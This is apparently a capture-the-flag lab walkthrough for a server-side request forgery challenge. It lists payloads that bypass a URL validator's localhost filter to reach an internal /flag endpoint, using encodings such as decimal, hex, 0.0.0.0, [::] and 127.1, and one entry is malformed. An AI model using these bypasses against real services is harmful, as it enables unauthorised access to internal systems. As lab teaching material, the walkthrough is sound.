A seemingly secure URL validation service stands between you and sensitive internal data! 🔒 The server thinks it's safe behind its firewall, but clever request manipulation might just convince it to fetch data from places it shouldn't. 🕵️ Master the art of server-side request forgery and turn the server against itself! 💥
This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.
The challenge presents a URL validation service that fetches and displays content from provided URLs. The service has basic protections against accessing localhost and internal IP ranges.
Several methods can bypass the URL validation filters:
http://0.0.0.0:8080/flaghttp://0:8080/flaghttp://[::]8080/flaghttp://2130706433:8080/flag (127.0.0.1 in decimal)http://0x7f000001:8080/flag (127.0.0.1 in hex)http://127.0.0.1:8080/flag with URL encodingThe internal service runs on port 8080 and has a /flag endpoint that contains sensitive information:
Submit the bypass payload to the validation service:
http://0.0.0.0:8080/flagMultiple SSRF techniques work for this challenge:
http://0:8080/flaghttp://2130706433:8080/flaghttp://localhost:8080/flag (if filter bypass works)http://127.1:8080/flagChoose how you want to get started
Choose a username to get started
We've sent a 9-character code to your email